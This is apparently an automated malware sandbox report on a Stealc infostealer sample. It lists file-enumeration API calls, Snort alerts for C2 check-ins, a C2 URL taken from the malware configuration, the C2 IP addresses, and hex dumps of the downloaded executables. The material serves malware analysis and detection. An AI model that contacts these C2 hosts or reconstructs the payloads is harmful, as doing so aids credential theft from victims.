Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044777911.00000240F7D50000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\timisa37 vugut_daxub.pdb source: kO1P1YnLst.exe, 00000000.00000003.1743343365.0000000005DC1000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000000.1740698273.0000000000413000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\nuze3\jimikusub 32\keb61_foyemi\38-vovake.pdb source: kO1P1YnLst.exe
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: nss3.pdb source: u5c4.0.exe, 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 1_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 1_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 1_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 1_2_004121F0
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_6C7B261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW, 2_2_6C7B261E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe File opened: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe File opened: C:\Users\user\AppData\Local\Temp\u5c4.2 Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2856233 ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) 192.168.2.4:49730 -> 185.172.128.90:80
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49733 -> 185.172.128.76:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49733 -> 185.172.128.76:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 185.172.128.76:80 -> 192.168.2.4:49733
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49733 -> 185.172.128.76:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.172.128.76/3cd2b41cbde8fc9c.php
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 91.215.85.66 ports 9000,1,4,5,6,7,15647
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49845
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 49854 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49855
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49861
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 49864 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49864
Yara detected Generic Downloader
Source: Yara match File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f79a0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d4d525.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d7432f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d98739.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49755 -> 91.215.85.66:15647
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 22:46:02 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 26 Apr 2024 22:45:02 GMTETag: "48000-61707a77a069a"Accept-Ranges: bytesContent-Length: 294912Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0f 14 d4 08 4b 75 ba 5b 4b 75 ba 5b 4b 75 ba 5b 46 27 65 5b 55 75 ba 5b 46 27 5a 5b c3 75 ba 5b 46 27 5b 5b 64 75 ba 5b 42 0d 29 5b 48 75 ba 5b 4b 75 bb 5b 3b 75 ba 5b fe eb 5f 5b 4a 75 ba 5b 46 27 61 5b 4a 75 ba 5b fe eb 64 5b 4a 75 ba 5b 52 69 63 68 4b 75 ba 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b8 d4 c7 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 1a 01 00 00 3c c2 03 00 00 00 00 e7 40 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 c3 03 00 04 00 00 ec 72 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 94 01 00 28 00 00 00 00 f0 c1 03 e8 69 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 c3 03 4c 14 00 00 00 32 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 89 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a3 18 01 00 00 10 00 00 00 1a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 6d 00 00 00 30 01 00 00 6e 00 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 4d c0 03 00 a0 01 00 00 74 01 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 69 01 00 00 f0 c1 03 00 6a 01 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 4c 14 00 00 00 60 c3 03 00 16 00 00 00 6a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 22:46:08 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 